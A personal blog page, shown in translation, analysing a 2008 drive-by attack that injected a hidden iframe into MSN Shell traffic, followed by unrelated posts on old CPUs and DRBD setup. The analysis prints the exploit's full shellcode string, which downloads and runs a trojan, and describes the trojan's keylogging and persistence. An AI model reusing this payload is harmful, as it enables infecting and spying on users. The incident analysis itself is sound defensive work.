2008-12-24

Was the SERVER hosting MSN SHELL hit by ARP trojan injection (ARP掛馬)??

2009-03-13 update.
The post 員外 Security: 網站轉址攻擊-ARP掛馬 (website redirect attacks and ARP trojan injection) pointed out a blind spot in my reasoning of 2009-03-11: to intercept traffic mid-path at a network node without ARP spoofing, you would have to break into the router itself or port-mirror the traffic across; otherwise, in theory, there is no way to hear unicast TCP packets.. (surely nobody still uses hubs these days, least of all an IDC..)
I am also attaching the packet sample captured with Wireshark on 2008-12-24, http://www.swm.idv.tw/20081224_cap.zip; anyone interested, or anyone holding samples of the March 2009 large-scale redirect packets, can download it for analysis and comparison.

2009-03-12 update.
A reader with expertise wrote in to discuss this, and I agree that my earlier conclusion was too hasty. From the behaviour pattern it looks as if the hosting facility or the backbone was ARP-spoofed, but the actual packet pattern does not quite match; of course it may also be a different implementation.
All of this is only guesswork from the externally visible situation and limited evidence; we have no access to the real core of the problem.
What is the truth? Unless an insider comes forward.. I expect it will soon be buried by time..

2009-03-11 update.
After testing the ARP trojan-injection tools I could find (see 'Observations on how ARP trojan injection operates' below) and then looking at the packet signatures, I found that ARP trojan injection does not produce two packets beyond the gateway; it intercepts and modifies the packet directly to insert the HTML. So the anomalous packets found here do not look like currently known ARP trojan injection; judging by their characteristics they are closer to the "IP spoofing" conclusion of the analysis
大規模網頁綁架轉址:威脅未解除,但專家都猜錯了 (large-scale web hijacking and redirection: the threat is not over, but the experts all guessed wrong).
This attack method appears to be mid-path interception at a network node, racing to send a forged packet first. This incident at the end of 2008 is very similar to the large-scale redirects of March 2009; it simply did not attract much attention when it happened.
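The update above turns on whether the forged packets needed ARP spoofing on the LAN or a foothold further upstream. One observable that separates the two is the ARP table itself: under ARP spoofing the gateway's IP is answered by a second MAC and usually flaps back, which is what arpwatch-style tools alert on. The following Python example is added here and is not code from the original post or from any tool it mentions; it parses constructed "arp -an" snapshots (Linux output format, made-up MACs, 192.168.1.1 assumed to be the gateway) and reports every IP whose MAC changes between snapshots.

```python
import re

# Constructed "arp -an" snapshots (Linux format), taken as if at successive
# moments on a LAN. 192.168.1.1 is assumed to be the gateway; all MACs are made up.
SNAPSHOTS = [
    "? (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0\n"
    "? (192.168.1.10) at 00:11:22:33:44:10 [ether] on eth0\n",
    "? (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0\n"
    "? (192.168.1.10) at 00:11:22:33:44:10 [ether] on eth0\n",
    # the gateway IP is now answered by a different MAC
    "? (192.168.1.1) at 00:11:22:33:44:99 [ether] on eth0\n"
    "? (192.168.1.10) at 00:11:22:33:44:10 [ether] on eth0\n",
    # and flaps back once the real gateway answers again
    "? (192.168.1.1) at 00:11:22:33:44:01 [ether] on eth0\n"
    "? (192.168.1.10) at 00:11:22:33:44:10 [ether] on eth0\n",
]

ARP_LINE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9A-Fa-f:]{17})")

def parse_arp_table(text):
    """Return [(ip, mac), ...] from 'arp -an' style output; MACs lower-cased."""
    return [(m.group(1), m.group(2).lower()) for m in ARP_LINE.finditer(text)]

def detect_arp_changes(snapshots, watch=None):
    """Compare successive ARP tables and return (snapshot_index, ip, old_mac, new_mac)
    for each IP whose MAC changed. 'watch' limits alerts to a set of IPs, e.g. the
    gateway; None means every IP is watched."""
    last = {}
    alerts = []
    for idx, text in enumerate(snapshots):
        for ip, mac in parse_arp_table(text):
            prev = last.get(ip)
            if prev is not None and prev != mac and (watch is None or ip in watch):
                alerts.append((idx, ip, prev, mac))
            last[ip] = mac
    return alerts

def macs_per_ip(snapshots):
    """How many distinct MACs each IP was seen with; more than one is suspicious."""
    seen = {}
    for text in snapshots:
        for ip, mac in parse_arp_table(text):
            seen.setdefault(ip, set()).add(mac)
    return {ip: len(macs) for ip, macs in seen.items()}

if __name__ == "__main__":
    for idx, ip, old, new in detect_arp_changes(SNAPSHOTS, watch={"192.168.1.1"}):
        print(f"snapshot {idx}: {ip} moved from {old} to {new}")
    print(macs_per_ip(SNAPSHOTS))
```

On a real host the snapshots would come from periodic `arp -an` runs (or from captured ARP replies); a gateway that shows two MACs over a short window is the LAN-side evidence the update says would be needed to support the ARP-spoofing theory.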

*2009-03-09 update. The recent large-scale web hijacking pattern seems somewhat similar to this case*

*2008-12-29 update. The downloaded trojan has been updated*

MSN SHELL is an MSN add-on that many people like to use because it offers message encryption. But today, besides finding that it leaks the MSN ACCOUNT, I found something more serious: the data-collection SERVER used by MSN SHELL may have been hit by ARP trojan injection (an ARP spoofing hijack used to plant a trojan). The impact could be enormous..

Today (2008-12-24), as soon as I booted and logged into MSN, Avira (小紅傘) raised an alert:
'HTML/Infected.WebPage.Gen [virus]'

It looked as if something in IE's CACHE had been hit, but I have not used IE as my BROWSER for a long time (I use FireFox),
so I checked the IE CACHE directory
and found the flagged gol.htm, shown in the image below



Here you can see that gol.htm came from http://shell09.msnshell.com/,
and that this request also sends the MSN version, MSNSHELL version, locale and the MSN ACCOUNT in use back to the shell09.msnshell.com SERVER


The content of gol.htm in the IE CACHE is


At the very beginning an iframe with width and height 0 has been inserted, pointing to

http:// 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / i n d e x 3 . h t m (the URL is spaced out so nobody clicks it by mistake)
Fetching this index3.htm and looking at it,

it is obviously a trojan-dropping file; I have not had time to analyse its content yet.
It looks like it targets the IE7 vulnerability that MS only patched two days ago.

Also, 60.248.23.20, the address linked from this IFRAME, is a Taiwanese IP,

Next, let's analyse why shell09.msnshell.com (222.73.57.115) is getting the trojan injected, and only intermittently.

Looking at the packets,
the very first packet returned after requesting gol.htm already has the iframe inserted


but the server information in its http header is Tiny Httpd.
Only the packets that follow are the normal ones,

whose http header gives the server information as Apache/2.2.4 (Unix).
These are the packets actually emitted by the http server of shell09.msnshell.com (222.73.57.115).

I also tested requesting the site root of shell09.msnshell.com (222.73.57.115) directly,



and it is the same: first the iframe emitted by TinyHttpd, then the 403 reply from Apache2

So my guess is that in the network segment of the facility hosting shell09.msnshell.com (222.73.57.115), the server that collects MSN SHELL's data, some other machine is infected with an ARP trojan-injection virus, which is why the iframe is being forced into the responses ??
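The symptom described above, a forged first response carrying a different Server banner that outruns the real one, is something a capture-side check can flag mechanically. The following Python example is added here and is not code from the original post; it works on two constructed response segments modelled on the description (the iframe target is a placeholder, not the real address) and reports more than one status line for a single request, conflicting Server headers, and any iframe with width or height 0.

```python
import re

# Constructed samples modelled on the symptom described above: for one request,
# a first "response" with a different Server banner and a 0x0 iframe, followed
# by the real server's reply. The iframe target is a placeholder, not the real one.
FORGED_SEGMENT = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Tiny Httpd\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<iframe src="http://injected.example.invalid/index3.htm" width=0 height=0></iframe>\r\n'
)
REAL_SEGMENT = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.4 (Unix)\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>gol</body></html>\r\n"
)
CLEAN_STREAM = [REAL_SEGMENT]
SUSPECT_STREAM = [FORGED_SEGMENT, REAL_SEGMENT]

STATUS_LINE = re.compile(r"^HTTP/\d\.\d \d{3} ", re.M)
# an iframe whose width or height is 0: the injection pattern seen in gol.htm
HIDDEN_IFRAME = re.compile(r"""<iframe[^>]*\b(?:width|height)\s*=\s*["']?0\b[^>]*>""", re.I)

def parse_response(segment):
    """Split one HTTP response into (status_line, headers dict with lower-case names, body)."""
    head, _, body = segment.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def analyse_stream(segments):
    """Findings for the response segments seen on one TCP stream, in order:
    more than one status line, conflicting Server banners, hidden iframes."""
    findings = []
    responses = [parse_response(s) for s in segments]
    status_count = sum(len(STATUS_LINE.findall(s)) for s in segments)
    if status_count > 1:
        findings.append(f"{status_count} status lines for one request")
    servers = {headers.get("server", "") for _, headers, _ in responses}
    if len(servers) > 1:
        findings.append("Server header mismatch: " + " vs ".join(sorted(servers)))
    for idx, (_, _, body) in enumerate(responses):
        if HIDDEN_IFRAME.search(body):
            findings.append(f"hidden iframe in segment {idx}")
    return findings

if __name__ == "__main__":
    print("clean:", analyse_stream(CLEAN_STREAM))
    print("suspect:", analyse_stream(SUSPECT_STREAM))
```

The two-status-line check is the most robust of the three: a Server banner can be spoofed to match and the payload need not be an iframe, but a race-injected reply still leaves the real server's response arriving behind it on the same stream.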


If you use MSN SHELL, please stay alert and UPDATE WINDOWS & your virus signatures immediately; one slip and you could be infected.


Postscript
1. 60.248.23.20 belongs to a Taiwanese company, "上麥資訊".
Did they plant the trojan themselves, or has the machine been turned into a zombie?

2. index3.htm is confirmed to exploit the IE7 0Day vulnerability from a few days ago. It seems these trojan-dropping pages are all copied and tweaked from one another once one appears. XD
Inside it, the following
spray(a1+"9090"+"%u8b55%u81ec%ub4c4%ufffe%u60ff%u05eb%u458f%uebe8%ue845%ufff6%uffff%u7468%u7074%u2f3a%u362f%u2e30%u3432%u2e38%u3332%u322e%u2f30%u6174
%u6978%u412f%u7463%u7669%u5865%u652e%u6578%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ud233
%u30b2%u8b64%u8502%u78c0%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u4589%u83fc%u3cc0%u008b%u4503%u83fc%u78c0%u008b
%u4503%u8bfc%u2070%u7503%ue9fc%u0134%u0000%u458f%uc7d8%uf845%u0000%u0000%u7d8b%ufcd8%u28eb%u5756%ub950%uffff%uffff%uc032%uaef2%ud1f7%u4d89%u58f4
%ue85f%u0176%u0000%u758d%u03b8%uf875%u1689%u035e%uf47d%u4583%u04f8%u3f80%u7500%u47d3%u8d57%ub8b5%ufffe%u56ff%uff68%u0000%uff00%uc055%u45c7%u73d8
%u6264%uc72e%udc45%u7865%u0065%u45c7%u00e0%u0000%uc700%ue445%u0000%u0000%u758d%u56d8%ubd8d%ufeb8%uffff%uff57%uc855%u45c7%u75d8%u6c72%uc76d%udc45
%u6e6f%u642e%u45c7%u6ce0%u006c%uc700%ue445%u0000%u0000%u758d%u56d8%u558b%u8dbc%uec7d%u00be%u8860%ub97c%u0006%u0000%ua4f3%u32e8%u0001%u8900
%ufc45%u758d%ubfec%u6000%u7c88%u06b9%u0000%uf300%u5fa4%uff57%ufc75%u7d8d%u64ec%u04a1%u0000%u8900%u6407%u08a1%u0000%u8900%u0447%uc764%u0405
%u0000%u0000%u8860%u647c%u05c7%u0008%u0000%u6000%u7c88%u55ff%u89b8%ub485%ufffe%u8dff%uec75%u068b%ua364%u0004%u0000%u468b%u6404%u08a3%u0000
%u6a00%u6a00%u8d00%ub8bd%ufffe%u57ff%u75ff%u6ae8%uff00%ub495%ufffe%u6aff%u8d00%ub8b5%ufffe%u56ff%u55ff%u6acc%uff00%ud055%uc7e8%ufffe%u47ff%u7465%u7250
%u636f%u6441%u7264%u7365%u0073%u6f4c%u6461%u694c%u7262%u7261%u4179%u4700%u7465%u6554%u706d%u6150%u6874%u0041%u736c%u7274%u656c%u416e%u6c00
%u7473%u6372%u7461%u0041%u6957%u456e%u6578%u0063%u7845%u7469%u7250%u636f%u7365%u0073%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c
%u0041%u56eb%u508b%u5718%u5251%u8b56%u0336%ufc75%uf3fc%u5ea6%u595a%u745f%u8306%u04c6%u754a%u8be8%u1848%uca2b%ue1d1%u508b%u0324%ufc55%ud103
%uc933%u8b66%ud10a%ud1e1%u8be1%u1c50%u5503%u03fc%u8bd1%u0312%ufc55%uff5b%u58e3%u00b9%u8860%u517c%u01c6%u8968%u0141%u41c6%uc305%ue2ff"); is one long string that, once decoded, turns out to hide the download URL,

h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e (again with a space between every character, to avoid accidents)
When I have time I will look into what it actually does

3. VirusTotal's analysis report for the downloaded ActiveX.exe

File ActiveX.exe received on 12.24.2008 17:25:37 (CET)
Current status:finished Result: 9/39 (23.08%)

Antivirus Version Last-Update Result
a-squared 4.0.0.73 2008.12.24 -
AhnLab-V3 2008.12.25.0 2008.12.24 -
AntiVir 7.9.0.45 2008.12.24 -
Authentium 5.1.0.4 2008.12.24 W32/PoisonIvy.E.gen!Eldorado
Avast 4.8.1281.0 2008.12.24 -
AVG 8.0.0.199 2008.12.24 BackDoor.PoisonIvy
BitDefender 7.2 2008.12.24 Trojan.Downloader.Agent.ZCR
CAT-QuickHeal 10.00 2008.12.24 -
ClamAV 0.94.1 2008.12.24 -
Comodo 809 2008.12.24 -
DrWeb 4.44.0.09170 2008.12.24 -
eSafe 7.0.17.0 2008.12.24 -
eTrust-Vet 31.6.6276 2008.12.24 -
Ewido 4.0 2008.12.24 -
F-Prot 4.4.4.56 2008.12.24 W32/PoisonIvy.E.gen!Eldorado
F-Secure 8.0.14332.0 2008.12.24 W32/PoisonIvy.gen22
Fortinet 3.117.0.0 2008.12.24 -
GData 19 2008.12.24 Trojan.Downloader.Agent.ZCR
Ikarus T3.1.1.45.0 2008.12.24 -
K7AntiVirus 7.10.564 2008.12.24 -
Kaspersky 7.0.0.125 2008.12.24 -
McAfee 5473 2008.12.23 -
McAfee+Artemis 5473 2008.12.23 -
Microsoft 1.4205 2008.12.24 Backdoor:Win32/Poisonivy.E
NOD32 3716 2008.12.24 -
Norman 5.80.02 2008.12.24 W32/PoisonIvy.gen22
Panda 9.0.0.4 2008.12.24 -
PCTools 4.4.2.0 2008.12.24 -
Prevx1 V2 2008.12.24 -
Rising 21.09.22.00 2008.12.24 Trojan.Win32.Undef.vir
SecureWeb-Gateway 6.7.6 2008.12.24 -
Sophos 4.37.0 2008.12.24 -
Sunbelt 3.2.1809.2 2008.12.22 -
Symantec 10 2008.12.24 -
TheHacker 6.3.1.4.199 2008.12.23 -
TrendMicro 8.700.0.1004 2008.12.24 -
VBA32 3.12.8.10 2008.12.24 -
ViRobot 2008.12.24.1534 2008.12.24 -
VirusBuster 4.5.11.0 2008.12.24 -

Additional information
File size: 11776 bytes
MD5...: 68fb7e446198055cece63ae002065f98
SHA1..: f3528e710b6e73741fca0d5ffb4f31022616ab30
SHA256: 8e25f68a836b0c562cd575ff3b56f2073df4414d102eb97e0cf79a7c5423340b
SHA512: 9a456f53c90685f24eab8da8bfd95ce959b6f582831f5ec7f8598ba135844311
f782fabd1d8a33f582f860426b24915b4f3fec24f2bbb81fa417ce03a59a7876
ssdeep: 192:p3yFbGZTscP4oyn+5MYNmtNJD5UxMpuYGunUQGdD4RxvjqbqUA2cm4RX2Q3M
7Sfr:JOGZYi4o5MYNAJD5UyuYVnUQG9axvjqW
PEiD..: Armadillo v1.71
TrID..: File type identification
Win32 Executable Generic (42.3%)
Win32 Dynamic Link Library (generic) (37.6%)
Generic Win/DOS Executable (9.9%)
DOS Executable Generic (9.9%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4013c0
timedatestamp.....: 0x49503e0f (Tue Dec 23 01:25:35 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x515 0x600 5.28 4bdf9e12b88dc8c76c7e22d733e4e4e4
.rdata 0x2000 0x2b4 0x400 3.42 9480d3dc61527ddfacb7fb9373fbcc60
.data 0x3000 0x1e60 0x2000 7.82 984d3ad35e502800c4b95c340aeb5ae4

( 2 imports )
> MSVCRT.dll: _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _controlfp, _initterm, __getmainargs, __p___initenv, exit, _XcptFilter, _exit, __CxxFrameHandler, _except_handler3, __3@YAXPAX@Z
> KERNEL32.dll: lstrcpyA, lstrcatA, CreateFileA, WriteFile, CloseHandle, WinExec, ExitProcess, GetModuleFileNameA

It seems the detection rate is still not very high

4. 2008-12-26. Judging by visitor referrers over the past two days, many people arrived by searching for 60.248.23.20 & gol.htm, so quite a few have apparently noticed this by now.

5. When I ran the downloaded ActiveX.exe in an isolated environment, it created C:\WINDOWS\system32\mftp.exe & 123.bat (a batch file that deletes itself after running), then created a startup entry named svchost.exe under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that runs C:\WINDOWS\system32\mftp.exe. Oddly, mftp.exe and ActiveX.exe are exactly the same file (the MD5SUM matches), and it did not seem to do anything else.. further analysis may be needed..

6. 2008-12-27: 60.248.23.20 currently seems unreachable; I don't know whether it has been discovered and dealt with or simply cannot cope with the volume of connections. When it was still reachable on 2008-12-24 I checked: it is a Windows 2000 machine.

7. http://www.swm.idv.tw/60.248.23.20_torjan.zip contains the files fetched on 2008-12-25 from http:// 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / i n d e x 3 . h t m & h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e; the archive password is 60.248.23.20. Anyone interested can download it for study (!!careful!!)

8. 2008-12-28: the damage from this ARP-injected iframe index3.htm seems to be spreading; another affected site now known is forum.vbulletin-china.cn (125.89.79.139), presumably also caught up in ARP hijacking and trojan injection.

9. 2008-12-29 update
I ran nmap against 60.248.23.20 (Windows 2000)
and found the following open ports
Discovered open port 3389/tcp on 60.248.23.20 Windows RDP
Discovered open port 21/tcp on 60.248.23.20 FTP
Discovered open port 8888/tcp on 60.248.23.20 ????
Discovered open port 5800/tcp on 60.248.23.20 VNC-HTTP
Discovered open port 5900/tcp on 60.248.23.20 VNC
Discovered open port 1433/tcp on 60.248.23.20 MS-SQL
Presumably an unmanaged machine that was broken into and put to use

Testing h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e today, the file has actually been revised. The one fetched earlier was
ActiveX.exe 2008-12-23 09:25 11776 bytes md5sum:68fb7e446198055cece63ae002065f98
and today it has been replaced with a new one:
ActiveX.exe 2008-12-26 15:07 12800 bytes md5sum:4405441a2b01ad5fce015cdd5a8c80fe
This file is caught by the Avira I have installed as TR/Dldr.Agent.12800.3 [trojan] (the earlier one was not); my guess is the earlier one was an experiment, or just badly written.
I submitted it to Virus.Org for analysis (because virustotal seemed to be down)

The following represents the test results from the virus scanners used by the Virus.Org scanning service when it performed the scan on the file 'ActiveX.exe_20081229_TORJAN'.

File: ActiveX.exe_20081229_TORJAN
SHA-1 Digest: 9ad1f1b647d6266a2a7dd4e7ee5b1d091bc7ce7f
Size: 12800 bytes
Detected Packer: Microsoft Visual C++ v5.0/v6.0 (MFC)
Status: Infected or Malware (Confidence 30.43%)
Date Scanned: Mon Dec 29 12:03:22 +0000 2008

Scanner Scanner Version Scanner Engine Scanner Signatures Result Scan Time
A-Squared 4.0.0.29 N/A 1230552006 Clean 30.88 secs
Arcavir 1.0.5 N/A 14:07 13-12-2008 Clean 21.83 secs
avast! 1.0.8 N/A 081228-0 Win32:Rootkit-gen 73.27 secs
AVG Anti Virus 7.5.52 442 270.10.1/1867 Clean 70.36 secs
Avira AntiVir 2.1.12-100 7.9.0.45 7.1.1.45 TR/Dldr.Agent.12800.3 107.02 secs
BitDefender 7.81008 7.22837 2390111 Trojan.Downloader.Agent.ZCR 23.78 secs
CA eTrust N/A 31.06.00 31.06.6274 Clean 21.35 secs
CAT QuickHeal 10.00 N/A 29 December, 2008 Clean 77.78 secs
Comodo 3.0 3.0 834.4321976 Clean 10.70 secs
CPSecure 1.15 1.1.0.715 26/12/2008 10:37AM Clean 101.28 secs
Dr. Web 4.44.0.10060 4.44.0.9170 494777 Clean 73.74 secs
F-PROT 4.6.8 3.16.16 20 November 2008 Clean 62.52 secs
F-PROT 6 6.2.1.4252 4.4.4.56 200812282035 W32/PoisonIvy.E.gen!Eldorado 32.33 secs
F-Secure 1.10 6392 2008-12-29_03 Backdoor.Win32.Poison.ous [AVP] 94.35 secs
Ikarus T3SCAN 1.32.4.0 1.01.45 2008-12-29 04:57:50 Clean 108.05 secs
Kaspersky 5.7.13 1367201 29-12-2008 Backdoor.Win32.Poison.ous 211.55 secs
McAfee Virusscan 5.30.0 5.3.00 v5477 Clean 51.25 secs
Norman Virus Control 7.00.00 5.93.01 5.93.00 Clean 175.55 secs
Panda 9.04.03.0001 1847194 28/12/2008 Clean 26.53 secs
Sophos Sweep 4.36.0 2.81.2 4.36 Clean 63.30 secs
Trend Micro N/A 8.700-1004 736 TROJ_POISON.LO 10.59 secs
VBA32 3.12.8.10 N/A 2008.12.28 Clean 54.87 secs
VirusBuster 2005 1.3.4 4.3.23:9 9.144.53/11.0 Clean 44.53 secs



If this new h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e is downloaded and executed, it does the following:
a. copies itself to C:\WINDOWS\system32\svahost.exe
b. in the registry, under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
creates a startup entry
"svchost"="C:\\WINDOWS\\system32\\svahost.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6605C18D-7259-D9DB-F7B2-7EF7712E0D2A}
"StubPath"="C:\\WINDOWS\\system32\\svahost.exe"

c. logs every program run & all mouse/keyboard activity to C:\\WINDOWS\\system32\\svahost; the log content looks like this
=================================================================
trlAltCtrlAlt??    * - WINDOWSsysum 2Num 8Num 6Enter?sva?    +  KVMware Accelerated AMD PCNet Adapter (Microsoft's Packet Scheduler) : Capturing - Wiresharkum 2Num 2Num 2Num 2??    -  m 匯出登錄檔案aaa?    - + ?aaa.reg - 記事本trl?
=================================================================
d. attempts to connect to lovepi.8800.org tcp_port 80 (121.10.214.100 [Shantou, Guangdong])

Clearly a trojan.

10. 2008-12-31 update. A professional analysis report on the new h t t p : / / 6 0 . 2 4 8 . 2 3 . 2 0 / t a x i / A c t i v e X . e x e is now available

11. 2009-01-02 update. Searching Google for 60.248.23.20 now returns that trojan page, 囧~~


As for the signature inside http://60.248.23.20/taxi/index3.htm,
var mystr ="http://rਊr.book.com";
a GOOGLE search for rਊr turns up an explanation of how it works.
Virus Total's analysis reports for index3.htm and for ActiveX.exe

12. 2009-03-09 update. Recently (early March 2009) it came out that cnet/msn taiwan also showed unexplained redirects.
I have had too many chores to spend much time chasing evidence about this large-scale redirect attack, but from packets others have captured online, an iframe is again inserted in front of the first http response packet, very close to the pattern found earlier.
The incident around Christmas 2008 did not attract wide attention because the affected sites were not well known.. a GOOGLE search for 60.248.23.20 turns up information on some of the victims.
If you still don't know what ARP trojan injection (ARP掛馬) is, please GOOGLE it.
A GOOGLE search for ARP+掛馬 returns about 102,000 results, but restricted to pages from Taiwan it returns only 469.
ARP trojan injection was already played to death in Chinese IDCs two years ago; I am surprised so few people in Taiwan discuss it.
And even if some machine in an IDC really is the culprit behind the injection, the evidence will presumably be destroyed once it is discovered, so I doubt the real story will ever be made public. Keep guessing, experts~~XD

13. 2009-03-11 update. Observations on how ARP trojan injection operates
From testing the ARP trojan-injection tools I could find and observing their packet patterns, ARP trojan injection does not produce two packets beyond the gateway, so this attack is more likely mid-path interception at a network node, racing to send a forged packet first.

14. 2009-03-12 update.
A reader with expertise wrote in to discuss this, and I agree that my earlier conclusion was too hasty. From the behaviour pattern it looks as if the hosting facility or the backbone was ARP-spoofed, but the actual packet pattern does not quite match; of course it may also be a different implementation.
All of this is only guesswork from the externally visible situation and limited evidence; there is no access to the core of the problem.
What is the truth? Unless an insider comes forward.. I expect it will soon be buried by time..

15. 2009-03-13 update.
The post 員外 Security: 網站轉址攻擊-ARP掛馬 (website redirect attacks and ARP trojan injection) pointed out a blind spot in my reasoning of 2009-03-11: to intercept traffic mid-path at a network node without ARP spoofing, you would have to break into the router itself or port-mirror the traffic across; otherwise, in theory, there is no way to hear unicast TCP packets.. (surely nobody still uses hubs these days, least of all an IDC..)
I am also attaching the packet sample captured with Wireshark on 2008-12-24, http://www.swm.idv.tw/20081224_cap.zip; anyone interested, or anyone holding samples of the March 2009 large-scale redirect packets, can download it for analysis and comparison.

2008-10-04

2008-10-04 The CPUs/RAM that survived my years of splurging on hardware

These are the remains I could still dig out.. CPU / RAM


486DX-33


486DX4-100


AMD5x86-P75 (486 DX-133)


AMD-K5 PR100


Celeron 533A


Celeron 950


P4-2.8G


Several other Cpus were given away / repurposed.. not kept..
including the 386-sx33 from my first PC (no idea where it went)..
an Intel Slot 1 chip (forgot which one)
the overclocking classic, the P2-era Celeron 333
an amd k6-2 400 (I remember it was great back then; I got three and even ran water cooling), also nowhere to be found now,
plus an AMD Athlon 850, AMD Barton 2500....

2008-10-02

Notes on building and testing DRBD on Debian

These are my notes on setting up DRBD (Distributed Replicated Block Device) on DEBIAN, with a record of a simple test run.
The whole test environment runs on VMware Server 1.07 build-108231.
Host configuration:
OS- Windows 2003 R2 Enterprise with SP2
CPU- Intel Q6600 2.4GHz
RAM- DDR2-800 2GB *4 = 8GB
HDD- Seagate ST3500320AS *2 with ICH9 AHCI
The partition used by the VMs is a Windows Software Raid-0

Guest configuration:
OS- Debian 4.0 etch [Kernel:2.6.18-6-686 (2.6.18.dfsg.1-22etch2)]
CPU- two Processors allocated by the VM
RAM- 512MB
HDD- 8G scsi with Independent-persistent
Eth0- Bridged
Eth1- Host-Only #private internal network for DRBD data exchange

Everything below is performed and tested on the Guests.
First prepare two identical VM environments: NODE-A, NODE-B
(after the basic Debian install you can simply copy the .vmdk disk file across and adjust the settings, which saves time)
Disk partitioning:
/dev/sda1 256M /boot #FS:ext3
/dev/sda2 7.7G LVM #PV for LVM, belongs to VG0
/dev/sda3 512M swap
LVM:
/dev/VG0/LVROOT 4G / #FS:XFS root filesystem; I did not bother splitting it further for a test
/dev/VG0/LVDRBD 2G /DRBD #for testing DRBD

Network settings
NODE-A
eth0 192.168.1.101 #bridged to the HOST's NIC, has external access
eth1 192.168.100.101 #Host-Only segment NIC, used for DRBD data exchange
NODE-B
eth0 192.168.1.102 #bridged to the HOST's NIC, has external access
eth1 192.168.100.102 #Host-Only segment NIC, used for DRBD data exchange

Installation/test steps:
1. Configure APT's Sources List
On NODE-A, first add Backports to /etc/apt/sources.list so that DRBD8 is available (etch itself only ships drbd0.7, which is rather old)
==================================
NODE-A# echo "deb http://www.backports.org/debian etch-backports main" >>/etc/apt/sources.list
==================================
Because the Backports GPG key is not present, apt-get update prints
==================================
W: GPG error: http://www.backports.org etch-backports Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY EA8E8B2116BA136C
W: You may want to run apt-get update to correct these problems
==================================
so its PGP key needs to be imported
NODE-A# gpg --keyserver hkp://subkeys.pgp.net --recv-keys 16BA136C
NODE-A# gpg --export | apt-key add -
After that, apt-get update works normally

2. Install drbd8 (source & utils)
NODE-A# apt-get install drbd8-source drbd8-utils
This pulls in all required dependencies as well

3. Build the drbd8 kernel module
Once drbd8-source is installed, the source is at /usr/src/drbd8.tar.bz2
Unpack it
NODE-A# cd /usr/src ; tar jxvf /usr/src/drbd8.tar.bz2
Use module-assistant to compile the drbd8 kernel module
NODE-A# module-assistant auto-install drbd8
This automatically installs all the build dependencies as well, and installs the module once compiled.
The resulting kernel module package is at /usr/src/drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb (the filename depends on the running KERNEL version)

4. Copy the compiled kernel module & drbd8-utils from NODE-A straight to NODE-B and install them there, so the same steps need not be repeated on NODE-B
/usr/src/drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb #drbd8 kernel module
/var/cache/apt/archives/drbd8-utils_2%3a8.0.13-2~bpo40+1_i386.deb #dig drbd8-utils out of apt's cache archives
On NODE-B just install them with dpkg -i (provided NODE-A & NODE-B run the same Kernel)
NODE-B# dpkg -i drbd8-2.6.18-6-686_8.0.13-2~bpo40+1+2.6.18.dfsg.1-22etch2_i386.deb drbd8-utils_2%3a8.0.13-2~bpo40+1_i386.deb

5. Configure /etc/drbd.conf
A basic test configuration, adapted from the defaults that come with the package; the minimal setup is
NODE-A & NODE-B : /etc/drbd.conf
==================================
common {
syncer { rate 10M; }
}
resource r0 {
protocol C;
disk { on-io-error detach; }
on NODE-A {
device /dev/drbd0;
disk /dev/VG0/LVDRBD;
address 192.168.100.101:7788;
meta-disk internal;
}
on NODE-B {
device /dev/drbd0;
disk /dev/VG0/LVDRBD;
address 192.168.100.102:7788;
meta-disk internal;
}
}
==================================

6. Initialise resource r0
NODE-A# drbdadm create-md r0
NODE-B# drbdadm create-md r0


7. Start the DRBD service
NODE-A# /etc/init.d/drbd start
NODE-B# /etc/init.d/drbd start

8. Check the state of DRBD resource r0
NODE-A# drbdadm state r0
Secondary/Secondary
NODE-B# drbdadm state r0
Secondary/Secondary
=====Connection established; both NODEs are currently Secondary====
NODE-A# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
ns:0 nr:0 dw:0 dr:0 al:0 bm:0 lo:0 pe:0 ua:0 ap:0
resync: used:0/61 hits:0 misses:0 starving:0 dirty:0 changed:0
act_log: used:0/257 hits:0 misses:0 starving:0 dirty:0 changed:0
NODE-B# cat /proc/drbd
version: 8.0.13 (api:86/proto:86)
GIT-hash: ee3ad77563d2e87171a3da17cc002ddfd1677dbe build by phil@fat-tyre, 2008-08-04 15:28:07
0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
